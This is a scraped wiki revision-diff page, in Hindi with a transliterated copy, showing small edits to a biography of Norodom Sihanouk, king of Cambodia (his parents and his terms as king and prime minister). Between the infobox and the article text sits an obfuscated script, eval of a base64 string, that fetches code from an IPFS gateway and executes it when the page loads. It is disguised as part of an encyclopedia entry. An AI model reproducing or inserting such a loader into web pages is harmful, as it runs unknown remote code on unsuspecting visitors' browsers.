Difference between revisions of "नोरोदम शिनौक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{सूचना बक्सा राजनीतिज्ञ |चित्र=Hrm-norodom-sihanouk.jpg |चित्र का...' के साथ नया पृष्ठ बनाया)
 
Line 9: Line 9:
 
|मृत्यु स्थान=बीजिंग, [[चीन]]
 
|मृत्यु स्थान=बीजिंग, [[चीन]]
 
|मृत्यु कारण=
 
|मृत्यु कारण=
|अभिभावक=पिता- नोरोदॉम सुरामरित और माता- सिसोवथ कोसामाक
+
|अभिभावक=पिता- नोरोदम सुरामरित और माता- सिसोवथ कोसामाक
 
|पति/पत्नी=नोरोडोम मोनिनेथ
 
|पति/पत्नी=नोरोडोम मोनिनेथ
 
|संतान=नॉरदॉम सिहमोनी, नॉरोडोम रानारीद्ध
 
|संतान=नॉरदॉम सिहमोनी, नॉरोडोम रानारीद्ध
Line 34: Line 34:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''नोरोदम शिनौक''' (अंग्रेज़ी: ''Norodom Sihanouk'', जन्म: [[31 अक्टूबर]], [[1922]], कंबोडिया; मृत्यु: [[15 अक्टूबर]],  [[2012]], बीजिंग, [[चीन]]) कंबोडिया के राजा थे।
+
'''नोरोदम शिनौक''' ([[अंग्रेज़ी]]: ''Norodom Sihanouk'', जन्म: [[31 अक्टूबर]], [[1922]], कंबोडिया; मृत्यु: [[15 अक्टूबर]],  [[2012]], बीजिंग, [[चीन]]) कंबोडिया के राजा थे।
  
*द्वितीय विश्व युद्ध के बाद, कंबोडिया की स्वतंत्रता के लिए नोरोदम शिनौक ने [[1953]] में फ़्रासीसी शासन से प्रचार किया। [[1955]] में, सिहानोक ने अपने पिता नोरोदम सुरामरित के पक्ष में सिंहासन का त्याग कर दिया और राजनीतिक संगठन संगकूम में 1955 के आम चुनावों में जीत का नेतृत्व किया, और कंबोडिया के प्रधान मंत्री बन गए।
+
*इनके पिता- नोरोदम सुरामरित और माता- सिसोवथ कोसामाक थी।
*नोरोदम शिनौक कंबोडिया के दो बार राजा बने। यह [[24 अप्रैल]], [[1941]] से [[2 मार्च]], 1955 तथा बाद में [[24 सितम्बर]], [[1993]] से [[7 अक्टूबर]],  [[2004]] तक रहे।
+
*नोरोदम शिनौक ने [[1955]] में अपने पिता नोरोदम सुरामरित के पक्ष में सिंहासन का त्याग कर दिया और राजनीतिक संगठन संगकूम में 1955 के आम चुनावों में जीत का नेतृत्व किया और कंबोडिया के प्रधान मंत्री बन गए।
*इनके पिता- नोरोदम सुरामरित और माता- सिसोवथ कोसामाक थे।
+
*वह [[22 मार्च]], [[1955]] से [[18 मार्च]], [[1970]] तक कंबोडिया के प्रधान मंत्री रहे।
 +
*नोरोदम शिनौक कंबोडिया के दो बार राजा बने। यह [[24 अप्रैल]], [[1941]] से [[2 मार्च]], 1955 तथा बाद में [[24 सितम्बर]], [[1993]] से [[7 अक्टूबर]],  [[2004]] कंबोडिया के राजा रहे।
 
*नोरोदम शिनौक [[भारत]] में [[गणतंत्र दिवस]] के अवसर पर [[1975]] में मुख्य अतिथि के रूप में आये थे।
 
*नोरोदम शिनौक [[भारत]] में [[गणतंत्र दिवस]] के अवसर पर [[1975]] में मुख्य अतिथि के रूप में आये थे।
  

Revision as of 12:06, 6 May 2017

norodam shinauk
poora nam norodam shinauk
janm 31 aktoobar, 1922
janm bhoomi kanbodiya
mrityu 15 aktoobar, 2012
mrityu sthan bijiang, chin
abhibhavak pita- norodam suramarit aur mata- sisovath kosamak
pati/patni norodom monineth
santan n aaurad aaum sihamoni, n aaurodom ranariddh
prasiddhi kanbodiya ke raja
parti fanasipaik, sagakum
dharm therevad bauddh dharm

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

norodam shinauk (aangrezi: Norodom Sihanouk, janm: 31 aktoobar, 1922, kanbodiya; mrityu: 15 aktoobar, 2012, bijiang, chin) kanbodiya ke raja the.

  • inake pita- norodam suramarit aur mata- sisovath kosamak thi.
  • norodam shinauk ne 1955 mean apane pita norodam suramarit ke paksh mean sianhasan ka tyag kar diya aur rajanitik sangathan sangakoom mean 1955 ke am chunavoan mean jit ka netritv kiya aur kanbodiya ke pradhan mantri ban ge.
  • vah 22 march, 1955 se 18 march, 1970 tak kanbodiya ke pradhan mantri rahe.
  • norodam shinauk kanbodiya ke do bar raja bane. yah 24 aprail, 1941 se 2 march, 1955 tatha bad mean 24 sitambar, 1993 se 7 aktoobar, 2004 kanbodiya ke raja rahe.
  • norodam shinauk bharat mean ganatantr divas ke avasar par 1975 mean mukhy atithi ke roop mean aye the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh